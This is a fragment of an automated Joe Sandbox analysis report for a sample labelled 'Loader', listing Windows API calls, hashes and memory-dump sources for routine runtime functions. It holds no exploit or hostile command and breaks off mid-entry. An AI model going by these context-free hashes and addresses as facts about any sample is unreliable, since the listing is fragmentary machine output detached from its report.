                                                                                          • API String ID: 3906539128-0
                                                                                          • Opcode ID: 8c6a45c10979fc10b6ea1a5f3c5b5ed70b4732fee736fde4365c1c5f07bb8a47
                                                                                          • Instruction ID: 6cadf21543ddf819c02b8a2f2601566fd11c045f38f3d1aab287173dcf39fc32
                                                                                          • Opcode Fuzzy Hash: 8c6a45c10979fc10b6ea1a5f3c5b5ed70b4732fee736fde4365c1c5f07bb8a47
                                                                                          • Instruction Fuzzy Hash: DF31A57590122C9BCB62DF64D8897CDBBB8BF08710F5041DAE41CAB291EB749F858F45
                                                                                          APIs
                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0033E9A9,?,?,00000008,?,?,0034535B,00000000), ref: 0033EC7B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionRaise
                                                                                          • String ID:
                                                                                          • API String ID: 3997070919-0
                                                                                          • Opcode ID: 0b42a19f43eb48effc2f0dd23be82591c80ec39491fa305eced21fba459cd5db
                                                                                          • Instruction ID: cd4c328e968b16ef308149a62c5874953e4d310d9dde8fbc03a40db3a7ed1226
                                                                                          • Opcode Fuzzy Hash: 0b42a19f43eb48effc2f0dd23be82591c80ec39491fa305eced21fba459cd5db
                                                                                          • Instruction Fuzzy Hash: 16B11935610609DFD716CF28C4CAB657BA0FF45365F2A8658E89ACF2E1C335E992CB40
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 003296B1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: FeaturePresentProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 2325560087-0
                                                                                          • Opcode ID: 196dbcbf27147ace1acad511060d597d49336513d40baa5ffadbf755c0bf68ea
                                                                                          • Instruction ID: c71aa0516b5c314ad2c5788047ae57bd7d4eae5e17ca50a9f3d8c35428be82a7
                                                                                          • Opcode Fuzzy Hash: 196dbcbf27147ace1acad511060d597d49336513d40baa5ffadbf755c0bf68ea
                                                                                          • Instruction Fuzzy Hash: 08A18CB19113198BDB1ACF58E882BA9BBF4FB48325F25852ED815EB360D3759940CFD0
                                                                                          APIs
                                                                                            • Part of subcall function 003369B4: HeapAlloc.KERNEL32(00000008,00000000,00000000,?,00335B4F,00000001,00000364,00000002,000000FF,?,00000000,?,0032D615,00000000,?), ref: 003369F5
                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0033B849
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0033B93D
                                                                                          • FindClose.KERNEL32(00000000), ref: 0033B97C
                                                                                          • FindClose.KERNEL32(00000000), ref: 0033B9AF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                          • String ID:
                                                                                          • API String ID: 2701053895-0
                                                                                          • Opcode ID: ad1e0bf3b4488512f7e4d704f8721639b3207dac7198eccb2584fcb4fdae12fb
                                                                                          • Instruction ID: 4ab53e93f6729ec4120b5e175b9551e822dc8c49a0e937070f25d6c0f361f203
                                                                                          • Opcode Fuzzy Hash: ad1e0bf3b4488512f7e4d704f8721639b3207dac7198eccb2584fcb4fdae12fb
                                                                                          • Instruction Fuzzy Hash: E1515375A00118AFDF26AF388CC6ABEB7ADDF85354F144199F5099B201EB309D419B60
                                                                                          APIs
                                                                                            • Part of subcall function 0033590A: GetLastError.KERNEL32(00000000,?,00337C8D), ref: 0033590E
                                                                                            • Part of subcall function 0033590A: SetLastError.KERNEL32(00000000,?,?,00000028,00331F53), ref: 003359B0
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0033B004
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 3736152602-0
                                                                                          • Opcode ID: 1e86c47d57f1c93cdffa57feab9eda81b6884cfb6a9b6cc21353193f0a4e5f6d
                                                                                          • Instruction ID: 1512faaf32f6c431d6b7b96c9dfeec48396336ad97293385d54e660ca69b083a
                                                                                          • Opcode Fuzzy Hash: 1e86c47d57f1c93cdffa57feab9eda81b6884cfb6a9b6cc21353193f0a4e5f6d
                                                                                          • Instruction Fuzzy Hash: 75219572615206ABDF2EAA25DC82B7BB7ACEF44310F10407AFE15DB151EB74ED448B50
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0
                                                                                          • API String ID: 0-4108050209
                                                                                          • Opcode ID: 3600699d57daaea322d75769df52d188d26b2dcaccebf42e04f254843290b9f6
                                                                                          • Instruction ID: 28ffb5ea24b731647ddf42c14d75d7a2dfd1e11106cd8732d5c52c62735f1c29
                                                                                          • Opcode Fuzzy Hash: 3600699d57daaea322d75769df52d188d26b2dcaccebf42e04f254843290b9f6
                                                                                          • Instruction Fuzzy Hash: 57B1043090062A8BCB26CF68E9566BFBBB4AF14700F16461DE493DF691C771ED42CB51
                                                                                          APIs
                                                                                            • Part of subcall function 0033590A: GetLastError.KERNEL32(00000000,?,00337C8D), ref: 0033590E
                                                                                            • Part of subcall function 0033590A: SetLastError.KERNEL32(00000000,?,?,00000028,00331F53), ref: 003359B0
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0033B124
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 3736152602-0
                                                                                          • Opcode ID: d6d09a276baaf5322530e702426f0965714f544b008143b60c99a3455c403463
                                                                                          • Instruction ID: 70373e1558bcbaa5147d1d8f5db30b6339fee917acae8938a59dac5a9bd3a69e
                                                                                          • Opcode Fuzzy Hash: d6d09a276baaf5322530e702426f0965714f544b008143b60c99a3455c403463
                                                                                          • Instruction Fuzzy Hash: F5110072910516ABD7159F28DC96ABBB7ECFF05310F10417AFA05DB241EB78ED048750
                                                                                          APIs
                                                                                            • Part of subcall function 0033590A: GetLastError.KERNEL32(00000000,?,00337C8D), ref: 0033590E
                                                                                            • Part of subcall function 0033590A: SetLastError.KERNEL32(00000000,?,?,00000028,00331F53), ref: 003359B0
                                                                                          • EnumSystemLocalesW.KERNEL32(0033ACF0,00000001,00000000,?,-00000050,?,0033AAD3,00000000,-00000002,00000000,?,00000055,?), ref: 0033ACBA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                          • String ID:
                                                                                          • API String ID: 2417226690-0
                                                                                          • Opcode ID: 250216e97d1c360cb3c36f049c7765bbcb52d665ec0aa20eb8b8d761aa535b64
                                                                                          • Instruction ID: 622dde9f5bed4f97b6720f98ea49b2198f6895b9a0fc19e296febd55bd5934af
                                                                                          • Opcode Fuzzy Hash: 250216e97d1c360cb3c36f049c7765bbcb52d665ec0aa20eb8b8d761aa535b64
                                                                                          • Instruction Fuzzy Hash: C711E53B600B059FDB199F39C8D16BAB791FF80768F19452CE9868BA40E775B942C740
                                                                                          APIs
                                                                                            • Part of subcall function 0033590A: GetLastError.KERNEL32(00000000,?,00337C8D), ref: 0033590E
                                                                                            • Part of subcall function 0033590A: SetLastError.KERNEL32(00000000,?,?,00000028,00331F53), ref: 003359B0
                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0033AF0C,00000000,00000000,?), ref: 0033B2A9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 3736152602-0
                                                                                          • Opcode ID: f573901af2d0f18f5dd791d6be3921f4a807d298803e41673259222644ac5d4b
                                                                                          • Instruction ID: f5f57e024f23006334e97711e2fc43e6809b09f4bd67ab36e0592c0d21663146
                                                                                          • Opcode Fuzzy Hash: f573901af2d0f18f5dd791d6be3921f4a807d298803e41673259222644ac5d4b
                                                                                          • Instruction Fuzzy Hash: 47014932610116BBDB295A218C86BBFB758EB40328F154929EE16E7190EB30FE41C694
                                                                                          APIs
                                                                                            • Part of subcall function 0033590A: GetLastError.KERNEL32(00000000,?,00337C8D), ref: 0033590E
                                                                                            • Part of subcall function 0033590A: SetLastError.KERNEL32(00000000,?,?,00000028,00331F53), ref: 003359B0
                                                                                          • EnumSystemLocalesW.KERNEL32(0033AFB0,00000001,?,?,-00000050,?,0033AA9B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 0033AF8D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                          • String ID:
                                                                                          • API String ID: 2417226690-0
                                                                                          • Opcode ID: ea6d0f20e95a2719cef3c49b6088aa22374ee364d07509f360e658fa6e2a4f55
                                                                                          • Instruction ID: f6b076f774358e068369cf8bde4d16673a38c823a65b176ed2f54ac9353f2fde
                                                                                          • Opcode Fuzzy Hash: ea6d0f20e95a2719cef3c49b6088aa22374ee364d07509f360e658fa6e2a4f55
                                                                                          • Instruction Fuzzy Hash: 69F046762007045FCB266F34DCC1A7ABB94FF80368F05492CFA868B680C771AC02C640
                                                                                          APIs
                                                                                            • Part of subcall function 00331CD1: EnterCriticalSection.KERNEL32(?,?,00335D98,?,0034FC38,00000008,00335C8A,00000000,00000000,?), ref: 00331CE0
                                                                                          • EnumSystemLocalesW.KERNEL32(003368B0,00000001,0034FCB8,0000000C,003362B1,-00000050), ref: 003368F5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                          • String ID:
                                                                                          • API String ID: 1272433827-0
                                                                                          • Opcode ID: b771e55e0b0967f67aa5267e969912ac3ff528fbafec39da89244bb212023aba
                                                                                          • Instruction ID: 4acf2a56b49078029e9d23482cb51e7df0fc163cbb75b17bc0f93028e1c56038
                                                                                          • Opcode Fuzzy Hash: b771e55e0b0967f67aa5267e969912ac3ff528fbafec39da89244bb212023aba
                                                                                          • Instruction Fuzzy Hash: 13F0E776A40314EFD702EFA8E882B9D7BF0FB48725F10856AE4119B2A1DB7559018F44
                                                                                          APIs
                                                                                            • Part of subcall function 0033590A: GetLastError.KERNEL32(00000000,?,00337C8D), ref: 0033590E
                                                                                            • Part of subcall function 0033590A: SetLastError.KERNEL32(00000000,?,?,00000028,00331F53), ref: 003359B0
                                                                                          • EnumSystemLocalesW.KERNEL32(0033B0D0,00000001,?,?,?,0033AAF5,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 0033B0BC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                          • String ID:
                                                                                          • API String ID: 2417226690-0
                                                                                          • Opcode ID: 70befb509299f545d333434893bd3dbf27afee8296503a2596414afc1eb8a24e
                                                                                          • Instruction ID: 37c5edbf9fbacbbad07e0e2b80f65db9742062e555f7fe02b2e461b48d279722
                                                                                          • Opcode Fuzzy Hash: 70befb509299f545d333434893bd3dbf27afee8296503a2596414afc1eb8a24e
                                                                                          • Instruction Fuzzy Hash: 0CF0E53A30020997CB1AAF35D89576BBF94EFC1B60F0B4458EB198F291D7769842C790
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00330A23,?,20001004,00000000,00000002,?,?,0032F931), ref: 003363E9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 2299586839-0
                                                                                          • Opcode ID: 9471327509d684e43d102c23236ae2e591f2c385f813cb36a054e0ac44911b18
                                                                                          • Instruction ID: a8be5297092927087a2d1abd6da7f4c8fab46b173b5fea76789ba035e44d60b8
                                                                                          • Opcode Fuzzy Hash: 9471327509d684e43d102c23236ae2e591f2c385f813cb36a054e0ac44911b18
                                                                                          • Instruction Fuzzy Hash: DBE04F3A500128BFCF132F61EC46AAE7E2AFF45B61F018014FC056A131CB769920AAD0
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00009B50), ref: 00329A2C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          • Opcode ID: afbef1a321311397b2fe0e5e8092e7ddb124a68487e8e11875266e1b5a78198d
                                                                                          • Instruction ID: 64f031655bc94b838e53bea977ae0e25a0a3469321b8eec5d99c575edec462b8
                                                                                          • Opcode Fuzzy Hash: afbef1a321311397b2fe0e5e8092e7ddb124a68487e8e11875266e1b5a78198d
                                                                                          • Instruction Fuzzy Hash:
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 2
                                                                                          • API String ID: 0-450215437
                                                                                          • Opcode ID: ac9a93b9e31b62440016077258f875d3d6353f937dcec75d45cb0e711f04b238
                                                                                          • Instruction ID: 8a1b8641ccb6ab29eb90545eb8fac2e11d135e45fdace7c6f6be461e98353b5a
                                                                                          • Opcode Fuzzy Hash: ac9a93b9e31b62440016077258f875d3d6353f937dcec75d45cb0e711f04b238
                                                                                          • Instruction Fuzzy Hash: E6014F6A58D3C13FCB939B3005B06D2BFA11C27280F4C60D5C5C14F763E902954BEB81
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: HeapProcess
                                                                                          • String ID:
                                                                                          • API String ID: 54951025-0
                                                                                          • Opcode ID: 49e52973e24ad0b22ac46a7e5cf36a04e4440bd95cb44b2576fe96f807e723dc
                                                                                          • Instruction ID: 294b98c3a5ee05626c93cb5923ed49eeedf217c50564ed00bc403a89fb008a02
                                                                                          • Opcode Fuzzy Hash: 49e52973e24ad0b22ac46a7e5cf36a04e4440bd95cb44b2576fe96f807e723dc
                                                                                          • Instruction Fuzzy Hash: F6A012341002018F67414F315904B0836DCA501781B044054E014C4070DB2040405F00
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 347daff65e94d82f7958896c9d802667092a148e51cf0566f3480d3e15985e59
                                                                                          • Instruction ID: 1ce645c35863a1a01ed98d9729e4e6606c5e4317c302d29d915a505b118c39f3
                                                                                          • Opcode Fuzzy Hash: 347daff65e94d82f7958896c9d802667092a148e51cf0566f3480d3e15985e59
                                                                                          • Instruction Fuzzy Hash: 07D0927A641A58AFC211CF4AE440D41F7BCFB8E771B154166EA4893B20C331FC12CAE0
                                                                                          APIs
                                                                                          • GetCPInfo.KERNEL32(02A0FD60,02A0FD60,00000000,7FFFFFFF,?,0034417D,02A0FD60,02A0FD60,00000000,02A0FD60,?,?,?,?,02A0FD60,00000000), ref: 00344238
